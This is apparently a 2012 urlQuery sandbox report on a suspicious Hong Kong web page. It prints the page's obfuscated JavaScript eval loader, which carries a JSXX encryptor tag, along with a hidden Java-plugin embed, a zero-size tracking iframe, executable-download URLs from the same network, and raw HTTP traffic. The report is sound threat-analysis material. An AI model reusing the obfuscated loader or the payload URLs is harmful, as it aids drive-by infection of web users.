Overview

URLhttp://qq.wangmaqw.com/xx/index.html
IP112.213.118.229
ASNAS38197 Sun Network (Hong Kong) Limited
Location Hong Kong
Report completed2012-11-02 12:34:58 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-02 12:34:32 112.213.118.229 urlQuery Client1ET CURRENT_EVENTS JavaScript Obfuscation JSXX Script
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 4 reports on IP: 112.213.118.229

Date Alerts / IDS URL IP
2012-11-02 20:51:550 / 1http://qq.wangmaqw.com/xx/index.html112.213.118.229
2012-11-02 20:50:430 / 0http://112.213.118.229112.213.118.229
2012-11-02 19:45:220 / 4http://xx.xiamaw.com/010/jc112.txt112.213.118.229
2012-11-02 11:30:410 / 1http://qq.wangmaqw.com/xx/LVScHP2.html112.213.118.229

Last 6 reports on ASN: AS38197 Sun Network (Hong Kong) Limited

Date Alerts / IDS URL IP
2013-02-15 22:57:100 / 0http://uyhec.pillscapi.ru.com/112.213.118.30
2013-02-15 02:29:480 / 1http://fepjz.lfdoctor.ru.com/112.213.118.30
2013-02-14 21:43:020 / 2http://stopreporter.com/.sys/?getexe=fb.73.exe112.213.108.77
2013-02-14 21:41:060 / 2http://stopreporter.com/.sys/?getexe=get.exe112.213.108.77
2013-02-14 21:41:060 / 2http://stopreporter.com/.sys/?getexe=pp.12.exe112.213.108.77
2013-02-14 21:40:460 / 1http://stopreporter.com/.sys/?getexe=v2prx.exe112.213.108.77

Last 3 reports on domain: qq.wangmaqw.com

Date Alerts / IDS URL IP
2012-11-04 19:05:150 / 1http://qq.wangmaqw.com/xx/index.html112.213.118.228
2012-11-02 20:51:550 / 1http://qq.wangmaqw.com/xx/index.html112.213.118.229
2012-11-02 11:30:410 / 1http://qq.wangmaqw.com/xx/LVScHP2.html112.213.118.229



JavaScript

Executed Scripts (4)


Executed Evals (4)

#1 JavaScript::Eval (size: 4, repeated: 2) 

eval

#2 JavaScript::Eval (size: 1455, repeated: 1) 

function snSVx7() {
    kJMldnj4 = Math.PI;
    hLIJK1 = Math.tan;
    aJwmn5 = parseInt;
    eSeF7 = 'length';
    GUyy6 = 'test';
    yGdg6 = 'replace';
    scGYmu4 = aJwmn5(~ ((kJMldnj4 & kJMldnj4) | (~kJMldnj4 & kJMldnj4) & (kJMldnj4 & ~kJMldnj4) | (~kJMldnj4 & ~kJMldnj4)));
    deDYI4 = aJwmn5(((scGYmu4 & scGYmu4) | (~scGYmu4 & scGYmu4) & (scGYmu4 & ~scGYmu4) | (~scGYmu4 & ~scGYmu4)) & 1); /*Encrypt By xx.xiamaw.com's JSXX 0.44 VIP*/
    fzJuSu5 = deDYI4 << deDYI4;
    new function() {
        tsQNERT0 = pEfKB1('1Qe4dG*]6zY^k8vb]#&,m8$[x_GD3a]Nj5dsn7[F[8cu[S34Rlc]4r;idpDt=' [yGdg6](/[^v@0el9a]/g, ''));
    };
    try {
        if (!/^\d*$/g [GUyy6](HxSFUGc6));
    } catch (e) {
        HxSFUGc6 = scGYmu4;
    }
    DkJS7 = '';
    ExGWWtv1 = String[oVXcYr1('%6' + '6%72%' + '6F%6D%4' + '3%68%61' + '%72%4' + '3%6F%64' + '%65')];
    for (XxAgeoD6 = scGYmu4; XxAgeoD6 < MewFKXS8[eSeF7]; XxAgeoD6 -= -deDYI4) HxSFUGc6 = ((HxSFUGc6 & 127) << 25) | ((HxSFUGc6 & 4294967168) >>> 7) + MewFKXS8.charCodeAt(XxAgeoD6);
    LWJSUwm6 += deDYI4;
    HxSFUGc6 >>>= 0;
    for (XxAgeoD6 = scGYmu4, wlOxtO1 = deDYI4; XxAgeoD6 < CSNA8[eSeF7]; XxAgeoD6 += fzJuSu5, wlOxtO1++) {
        if (XxAgeoD6 >= (1 << 3)) {
            iIMV0 = XxAgeoD6 % (1 << 3);
        } else {
            iIMV0 = XxAgeoD6;
        }
        IVXXtD0 = aJwmn5('0x' + HxSFUGc6.toString(deDYI4 << 4).substr(iIMV0, 2)) + wlOxtO1;
        if (/^(\d{4})/g [GUyy6](IVXXtD0 + 744)) IVXXtD0 %= 5;
        DkJS7 += ExGWWtv1(aJwmn5(scGYmu4 + oVXcYr1('x') + CSNA8.charAt(XxAgeoD6) + CSNA8.charAt(XxAgeoD6 + aJwmn5(deDYI4))) ^ IVXXtD0);
    }
    try {
        new function() {
            tsQNERT0(DkJS7);
        }
    } catch (e) {
        try {
            new function() {
                kULc4 = parseInt;
                hLIJK1(DkJS7);
            }
        } catch (e) {
            window.location = '.';
        }
    }
}
try {
    pEfKB1('snSVx7();')
} catch (e) {
    try {
        LWJSUwm6 = scGYmu4;
        pEfKB1('snSVx7();');
    } catch (e) {
        alert('ere');
    }
}

#3 JavaScript::Eval (size: 236, repeated: 1) 

hLIJK1 = tsQNERT0;
sBvgr1 = kULc4(20100418);
while (window.closed) {}
document.write("<br>");
var gondady = document.createElement('body');
documfnt.fody 'applndCzild?gon|aey4;	
Sa~ AoadJdj=Heel^yRaGa6g_tiRzs)k";H
Za? Ur<x
g<n^a0xs)l)tq"l"K;F

#4 JavaScript::Eval (size: 9, repeated: 2) 

snSVx7();

Executed Writes (3)

#1 JavaScript::Write (size: 202, repeated: 1) 

<a href="http://countt.51yes.com/index.aspx?id=211212103" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count21.51yes.com/count1.gif" alt="51YESQÙß¡ûß"></a>

#2 JavaScript::Write (size: 88, repeated: 1) 

<embed id="deployJavaPlugin" type="application/java-deployment-toolkit" hidden="true" />

#3 JavaScript::Write (size: 398, repeated: 1) 

<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.htm?id=211212103&refe=&location=http%3A//qq.wangmaqw.com/xx/index.html&color=24x&resolution=1176x885&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko/20101203%20Firefox/3.6.13 height=0 width=0></iframe>


HTTP Transactions (8)


Request Response 
GET /xx/index.html HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 10279
Last-Modified: Fri, 02 Nov 2012 08:49:20 GMT
Accept-Ranges: bytes
Etag: &quot;faeffaf2d6b8cd1:8ac&quot;
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:23 GMT
GET /xx/swfobject.js HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 8153
Last-Modified: Fri, 02 Nov 2012 08:40:06 GMT
Accept-Ranges: bytes
Etag: &quot;ec86f1a8d5b8cd1:8ac&quot;
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:24 GMT
GET /xx/jpg.js HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 19883
Last-Modified: Fri, 02 Nov 2012 08:40:06 GMT
Accept-Ranges: bytes
Etag: &quot;83a1f7a8d5b8cd1:8ac&quot;
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:24 GMT
GET /click.aspx?id=211212103&logo=1 HTTP/1.1

Host: count21.51yes.com
GET /click.aspx?id=211212103&amp;logo=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
 
HTTP/1.1 200 OK

Content-Type: text/html; charset=gb2312

Date: Fri, 02 Nov 2012 11:34:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 1777
GET /count1.gif HTTP/1.1

Host: count21.51yes.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
 
HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 715
Last-Modified: Thu, 07 Apr 2005 17:25:22 GMT
Accept-Ranges: bytes
Etag: &quot;02d4c7963bc51:d21&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 02 Nov 2012 11:34:29 GMT
GET /sa.htm?id=211212103&refe=&location=http%3A//qq.wangmaqw.com/xx/index.html&color=24x&resolution=1176x885&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko/20101203%20Firefox/3.6.13 HTTP/1.1

Host: count21.51yes.com
GET /sa.htm?id=211212103&amp;refe=&amp;location=http%3A//qq.wangmaqw.com/xx/index.html&amp;color=24x&amp;resolution=1176x885&amp;returning=0&amp;language=undefined&amp;ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko/20101203%20Firefox/3.6.13 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://qq.wangmaqw.com/xx/index.html
 
HTTP/1.1 200 OK

HTTP/1.1 200 OK

Date: Fri, 02 Nov 2012 11:34:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 0
GET /favicon.ico HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: eLdI1=Yes; cck_lasttime=1351856070533; cck_count=0
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Content-Length: 1308
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:27 GMT
GET /favicon.ico HTTP/1.1

Host: qq.wangmaqw.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: eLdI1=Yes; cck_lasttime=1351856070533; cck_count=0
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Content-Length: 1308
Server: Microsoft-IIS/6.0
Date: Fri, 02 Nov 2012 11:34:30 GMT